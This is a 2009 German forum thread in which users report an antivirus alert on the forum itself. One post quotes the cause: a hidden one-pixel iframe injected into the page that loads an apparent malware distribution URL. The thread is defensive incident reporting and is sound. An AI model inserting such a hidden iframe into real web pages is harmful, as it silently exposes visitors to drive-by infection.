1. Cookies optimieren die Bereitstellung unserer Dienste. Mit der Nutzung unserer Dienste erklärst Du dich damit einverstanden, dass wir Cookies verwenden. Weitere Informationen
    Information ausblenden
  2. Willkommen im Forum von DIGITAL FERNSEHEN - dem führenden Portal für digitales Fernsehen, Medien und Entertainment. Wenn du hier neu bist, schau dich ruhig etwas um und melde dich an, um am Forengeschehen teilnehmen zu können.
    Information ausblenden

Avira Virscanner meldet "Maleware" gefunden

Dieses Thema im Forum "Computer & Co." wurde erstellt von zahni, 3. Dezember 2009.

  1. zahni

    zahni Board Ikone

    Registriert seit:
    22. Januar 2001
    Beiträge:
    3.940
    Zustimmungen:
    47
    Punkte für Erfolge:
    58
    Anzeige
    Hallo,

    Avira meldet heute morgen im Forum

    "In der Datei 'D:\******\Temporäre Internetdateien\Low\Content.IE5\LLO7PJTU\forum[1].htm'
    wurde ein Virus oder unerwünschtes Programm 'HTML/Infected.WebPage.Gen' [virus] gefunden.
    Ausgeführte Aktion: Zugriff verweigern"

    Siehe

    HTML/Infected.WebPage.Gen - Full description

    -Zahni
     
  2. zahni

    zahni Board Ikone

    Registriert seit:
    22. Januar 2001
    Beiträge:
    3.940
    Zustimmungen:
    47
    Punkte für Erfolge:
    58
    AW: Avira Virscanner meldet "Maleware" gefunden

    Damit ist übrigens wohl das IFRAME

    Code:
    [COLOR=#0000ff]<[/COLOR][COLOR=#800000]iframe[/COLOR][COLOR=#0000ff] [/COLOR][COLOR=#ff0000]width[/COLOR][COLOR=#0000ff]=1 [/COLOR][COLOR=#ff0000]height[/COLOR][COLOR=#0000ff]=1 [/COLOR][COLOR=#ff0000]border[/COLOR][COLOR=#0000ff]=0 [/COLOR][COLOR=#ff0000]frameborder[/COLOR][COLOR=#0000ff]=0 [/COLOR][COLOR=#ff0000]src[/COLOR][COLOR=#0000ff]="http://centiyo.com/in.cgi?default">[/COLOR][COLOR=#0000ff]</[/COLOR][COLOR=#800000]iframe[/COLOR][COLOR=#0000ff]>[/COLOR]
    Gemeint. Ist das Absicht ?

    Sonst wurde das Forum gehackt.

    -Zahni
     
  3. zahni

    zahni Board Ikone

    Registriert seit:
    22. Januar 2001
    Beiträge:
    3.940
    Zustimmungen:
    47
    Punkte für Erfolge:
    58
  4. Al09

    Al09 Guest

  5. zahni

    zahni Board Ikone

    Registriert seit:
    22. Januar 2001
    Beiträge:
    3.940
    Zustimmungen:
    47
    Punkte für Erfolge:
    58
    AW: Avira Virscanner meldet "Maleware" gefunden

    Ist leider kein Fehlalaram.

    Auf der Sieite befindet sich ein IFRAME-Tag auf eine "Böse" Seite.

    -Zahni
     
  6. zahni

    zahni Board Ikone

    Registriert seit:
    22. Januar 2001
    Beiträge:
    3.940
    Zustimmungen:
    47
    Punkte für Erfolge:
    58
    AW: Avira Virscanner meldet "Maleware" gefunden

    Jetzt hat es einer der Foren-Betreiber gemerkt...

    IFRAME ist wech.
     
    Zuletzt bearbeitet: 3. Dezember 2009
  7. zahni

    zahni Board Ikone

    Registriert seit:
    22. Januar 2001
    Beiträge:
    3.940
    Zustimmungen:
    47
    Punkte für Erfolge:
    58
  8. Interlink

    Interlink Junior Member

    Registriert seit:
    26. Oktober 2008
    Beiträge:
    39
    Zustimmungen:
    0
    Punkte für Erfolge:
    6
    AW: Avira Virscanner meldet "Maleware" gefunden

    Es wäre sehr schön, wenn das Editieren von Beiträgen auch ohne aktiviertes Javascript vernünftig funktionieren würde. Aber Absätze werden dann gnadenlos entfernt. Ich hatte den Malware-Alarm vor dem Morgengrauen über das Kontaktformular gemailt. Antivir hat soeben noch einmal Alarm gegeben. Ich habe dann in FireFox den Cache gelöscht und Antivir war zufrieden. Sicherheitshalber habe ich centiyo.com zusätzlich in der Hosts geblockt, aber das ist ja nicht die einzige Malware-Schleuder auf der Welt und man ist seit Jahren selbst auf seriösen Sites wie z.B. heise.de nicht mehr sicher vor solchen Dingen. Letzte Bastion war in diesem Fall nicht NoScript, sondern Antivir.
     

Diese Seite empfehlen